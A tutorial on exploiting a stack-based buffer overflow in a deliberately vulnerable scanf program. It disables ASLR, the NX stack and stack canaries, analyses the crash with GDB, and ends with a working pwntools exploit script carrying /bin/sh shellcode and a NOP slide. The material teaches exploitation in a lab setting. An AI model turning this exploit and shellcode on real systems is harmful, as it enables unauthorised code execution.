Basic Stack-Based Buffer Overflow

In this article, I am going to show how to exploit a stack-based buffer overflow and the conditions that make this possible.

For the purpose of this exercise, we are going to switch off 3 security features:

Address Space Layout Randomization (ASLR)
Non-executable stack (aka stack execution prevention, aka NX Bit)
Stack canary (aka stack-protector)

How to switch off ASLR

To switch off ASLR:

    $ sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'

(Note that I didn’t do sudo echo 0 > /proc/sys/kernel/randomize_va_space because the output redirection command > will be performed as standard user but we need root permission to perform this operation.)

How to switch off non-executable stack and stack canary security features

To switch off the non-executable stack and the stack canary protections, we need to compile the program as follow:

    $ gcc -fno-stack-protector -z execstack -o overflow64 overflow64.c

The use of the option -z execstack will prevent stack to be non-executable (i.e., it will be executable) while the option -fno-stack-protector disable the stack canary protection.

Stack-based buffer overflow scheme

The overflow of a variable positioned in the stack occurs when an operation is performed without checking the details of such operation resulting in a writing beyond the boundaries of such variable.

When an operation write data on a buffer based on the stack beyond its limits, this operation can cause the overwriting of the return address of the function where this variable is allocated.

This is because, as explained in The Stack, the local variables are above the return address as shown in the picture below.

How we can exploit this situation? What can we write into the stack?

The left stacks in both images represent a normal stack. The right stacks in both images represent a stack after the unsafe write operation.

The unsafe operation started to write data from the top of the stack (where the stack variable is stored) and continue beyond its limit to overwrite the return address of the same function. This address is where the program expect to find the return address of the function. By overwriting this address we are able to to diverge the execution of the program.

In this image, we can see that in the stack is written also some nop slides before the shellcode. These are only a series of nop operations, i.e., no-operation operation (0x90 in machine code). We use nop slide because sometimes it is difficult to the jump to the start of the shellcode. In this way it is possible to jump approximately before it. The nop operation is 1 byte long, and jumping to any byte address where these operations are located will not cause any error. This instruction is used because it does not do anything and it moves to the next operation. At the end of the nop slide the shellcode will be located and executed.

The program to exploit

This is the source code of the program that we are going to exploit:

    // file: overflow64.c
    #include<stdio.h>

    int main(int argc, char* argv[])
    {
        char buff[20];
        scanf("%s", buff);

        return 0;
    }

In line 7, there is a vulnerable operation. Why vulnerable? Because it does not check the boundaries of the arrays that are being copied (check man scanf).

Let’s compile this program as described in previously.

The first thing we need to do is to crash the program. If we input more than 20 characters the program crash:

    $ ./overflow64
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    Segmentation fault (core dumped)

We can see that the terminal reports Segmentation fault. Let’s try to get a bit more details on this crash.

The next step is to understand why it is crashing.

By running dmesg:

    $ dmesg | tail
    ......
    [13401.299114] overflow64[16566]: segfault at 616161616161 ip 0000616161616161 sp 00007fffffffddb0 error 14 in libc-2.27.so[7ffff79e4000+1e7000]

The logs shown by dmesg show that the program named “overflow64” received a segfault (segmentation fault) when trying to access a memory location with address 616161616161. (When we run the program, we input a lot of “a” that in ASCII are represented with the hexadecimal value of 0x61. Is it a coincidence? Spoiler alert: no.)

This happen because the program is trying to access a memory address that is not supposed to.

Giving in input more “a"s we can incur in a different dmesg message:

    $ dmesg | tail
    ......
    [13747.451995] traps: overflow64[16766] general protection ip:555555554697 sp:7fffffffdda8 error:0 in overflow64[555555554000+1000]

In this case the message is referring to a general protection. What is this? In x86_64 bit architecture the maximum canonical address is currently 0x00007fffffffffff. Therefore even if an address is 64 bit long, current processor use only 48 bits of those. This was done because 48 bit address gives already an address space of 256 terabytes, therefore it will be enough for quite a long future. Therefore instead of wasting hardware and power resources, the hardware manufactures decided this way. The architecture design support 64 bit but the current hardware implementations do not.

To gather even more information on the crash we can run the program within GDB. For this purpose I use GEF to have an easier access to debug information.

    $ gdb -q ./overflow64
    GEF for linux ready, type `gef` to start, `gef config` to configure
    73 commands loaded for GDB 8.1.0.20180409-git using Python engine 3.6
    Reading symbols from ./overflow64...(no debugging symbols found)...done.
    gef➤  r
    Starting program: /home/pippo/ctf/lectures/basic_buffer_overflow/overflow64 
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

    Program received signal SIGSEGV, Segmentation fault.
    [ Legend: Modified register | Code | Heap | Stack | String ]
    ───────────────────────────────────────────────────────────────── registers ────
    $rax   : 0x0               
    $rbx   : 0x0               
    $rcx   : 0x00007ffff7dd0560  →  0x00007ffff7dcc580  →  0x00007ffff7b9996e  →  0x636d656d5f5f0043 ("C"?)
    $rdx   : 0x00007ffff7dd18d0  →  0x0000000000000000
    $rsp   : 0x00007fffffffdcd8  →  "aaaaaaaaaaaaaaaaaa"
    $rbp   : 0x6161616161616161 ("aaaaaaaa"?)
    $rsi   : 0x1               
    $rdi   : 0x0               
    $rip   : 0x0000555555554697  →  <main+45> ret 
    $r8    : 0x0               
    $r9    : 0x0               
    $r10   : 0x0               
    $r11   : 0x0000555555554726  →   add BYTE PTR [rax], al
    $r12   : 0x0000555555554560  →  <_start+0> xor ebp, ebp
    $r13   : 0x00007fffffffddb0  →  0x0000000000000001
    $r14   : 0x0               
    $r15   : 0x0               
    $eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
    $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
    ───────────────────────────────────────────────────────────────────── stack ────
    0x00007fffffffdcd8│+0x0000: "aaaaaaaaaaaaaaaaaa"	 ← $rsp
    0x00007fffffffdce0│+0x0008: "aaaaaaaaaa"
    0x00007fffffffdce8│+0x0010: 0x00007fffff006161 ("aa"?)
    0x00007fffffffdcf0│+0x0018: 0x0000000100008000
    0x00007fffffffdcf8│+0x0020: 0x000055555555466a  →  <main+0> push rbp
    0x00007fffffffdd00│+0x0028: 0x0000000000000000
    0x00007fffffffdd08│+0x0030: 0x7d8cd030cadb6f2f
    0x00007fffffffdd10│+0x0038: 0x0000555555554560  →  <_start+0> xor ebp, ebp
    ─────────────────────────────────────────────────────────────── code:x86:64 ────
    0x55555555468c <main+34>        call   0x555555554540 <__isoc99_scanf@plt>
    0x555555554691 <main+39>        mov    eax, 0x0
    0x555555554696 <main+44>        leave  
    → 0x555555554697 <main+45>        ret    
    [!] Cannot disassemble from $PC
    ─────────────────────────────────────────────────────────────────── threads ────
    [#0] Id 1, Name: "overflow64", stopped, reason: SIGSEGV
    ───────────────────────────────────────────────────────────────────── trace ────
    [#0] 0x555555554697 → main()
    ────────────────────────────────────────────────────────────────────────────────
    0x0000555555554697 in main ()

In line 47, this program stopped because received the SIGSEGV i.e., segmentation fault (see man 7 signal for more information on signals).

In lines 41-45, you can see code information. You can see that the program stopped at the ret instruction.

In lines 12-30, you can see registers information.

In lines 32-39, you can see stack information.

In line 7, we can see the input that we fed to the program.

The ret takes the address pointed by the stack pointer (rsp) and continue the execution from there. The address that the program is trying to jump to is an invalid address that we overwrite when we overflow the address. Our goal is to be able to write in this address an arbitrary address so that we can divert the execution.

We need to write an address that when executed its content will eventually execute our shellcode.

With the help of GDB we can break in the main function and have a look at the stack address of the function:

    $ gdb -q ./overflow64
    GEF for linux ready, type `gef` to start, `gef config` to configure
    73 commands loaded for GDB 8.1.0.20180409-git using Python engine 3.6
    Reading symbols from ./overflow64...(no debugging symbols found)...done.
    gef➤  b main
    Breakpoint 1 at 0x66e
    gef➤  r
    Starting program: /home/pippo/ctf/lectures/basic_buffer_overflow/overflow64 
    ......
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
    0x00007fffffffdcc0│+0x0000: 0x00005555555546a0  →  <__libc_csu_init+0> push r15	 ← $rsp, $rbp
    0x00007fffffffdcc8│+0x0008: 0x00007ffff7a05b97  →  <__libc_start_main+231> mov edi, eax
    0x00007fffffffdcd0│+0x0010: 0x0000000000000001
    0x00007fffffffdcd8│+0x0018: 0x00007fffffffdda8  →  0x00007fffffffe12f  →  "/home/pippo/ctf/lectures/basic_buffer_overflow/ove[...]"
    0x00007fffffffdce0│+0x0020: 0x0000000100008000
    0x00007fffffffdce8│+0x0028: 0x000055555555466a  →  <main+0> push rbp
    0x00007fffffffdcf0│+0x0030: 0x0000000000000000
    0x00007fffffffdcf8│+0x0038: 0x34f880d1fbfab7e5
    ────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
    0x555555554665 <frame_dummy+5>  jmp    0x5555555545d0 <register_tm_clones>
    0x55555555466a <main+0>         push   rbp
    0x55555555466b <main+1>         mov    rbp, rsp
    → 0x55555555466e <main+4>         sub    rsp, 0x30
    0x555555554672 <main+8>         mov    DWORD PTR [rbp-0x24], edi
    0x555555554675 <main+11>        mov    QWORD PTR [rbp-0x30], rsi
    0x555555554679 <main+15>        lea    rax, [rbp-0x20]
    0x55555555467d <main+19>        mov    rsi, rax
    0x555555554680 <main+22>        lea    rdi, [rip+0x9d]        # 0x555555554724
    ......
    Breakpoint 1, 0x000055555555466e in main ()

(The snippet shows only the interesting parts.)

In line 11, we can see that the stack is currently at position 0x00007fffffffdcc0. The space of the local variable have not been allocated yet as shown in line 23. When we overflow the local variables we are going to write our shellcode around this address.

In order to execute the shellcode we need to overwrite the return address of the function with our crafted address.

The location of the return address to overwrite is relative to the buffer that we are overflowing depends on many things. It depends on the size of other local variables (and their positions compared to the overflowed one) the stack alignment, and to the presence of the stack canary.

The best way to find the correct location is to try to input increasingly number of input until we can see that we overwrite the return address of the function.

Once we find the offset of the return address, we need to point it to the shellcode. We have already found the location near where the shellcode will be located. What needs to be placed in the stack is a nop slide to help to reach our shellcode as shown previously.

This is achieved with the following code (I am using Pwntools):

    # filename: exploit_overflow64.py
    from pwn import *
    import sys

    # process name to exploit
    process_path = "./overflow64"

    shellcode  = "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f"
    shellcode += "\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57"
    shellcode += "\x54\x5f\x6a\x3b\x58\x0f\x05"

    # return address obtained by adding 0x30 to the top of the stack
    # maximum canonical address size is 0x00007FFFFFFFFFFF
    ret_addr = "\x00\x00\x7f\xff\xff\xff\xdd\x50"[::-1]

    payload  = "A"*40 + ret_addr
    payload += "\x90" * 500 + shellcode

    # Writing payload to file to be used elsewhere (e.g., GDB)
    f = open("payload", 'w')
    f.write(payload)
    f.close()

    # start the program
    proc = process(process_path)

    # send payload
    proc.sendline(payload)

    # we need interact with the spawned shell
    proc.interactive()
    proc.close()

In line 16, we can see that I am preparing the input to the scanf function writing 40 “A”, then the return address, then 500 nop operations and finally the shellcode.

Now can can give the input to the function that will overflow the variable and write the correct return address. We can run it on GDB and break it just after the scanf function our stack will look like this:

    gef➤  dereference $rsp 20
        0x00007fffffffdc90│+0x0000: 0x00007fffffffdda8  →  0x9090909090909090	 ← $rsp
        0x00007fffffffdc98│+0x0008: 0x0000000100000000
        0x00007fffffffdca0│+0x0010: 0x4141414141414141
        0x00007fffffffdca8│+0x0018: 0x4141414141414141
        0x00007fffffffdcb0│+0x0020: 0x4141414141414141
        0x00007fffffffdcb8│+0x0028: 0x4141414141414141
        0x00007fffffffdcc0│+0x0030: 0x4141414141414141	 ← $rbp
        0x00007fffffffdcc8│+0x0038: 0x00007fffffffdd50  →  0x9090909090909090
        0x00007fffffffdcd0│+0x0040: 0x9090909090909090
        0x00007fffffffdcd8│+0x0048: 0x9090909090909090
        0x00007fffffffdce0│+0x0050: 0x9090909090909090

The address below the rbp is the one that contains the return address that we overwrite when we overflow the variable and now it points to a location where nop are store. At the end of the nop there is the shellcode, when executed, the program is going to eventually execute the shellcode that was our initial goal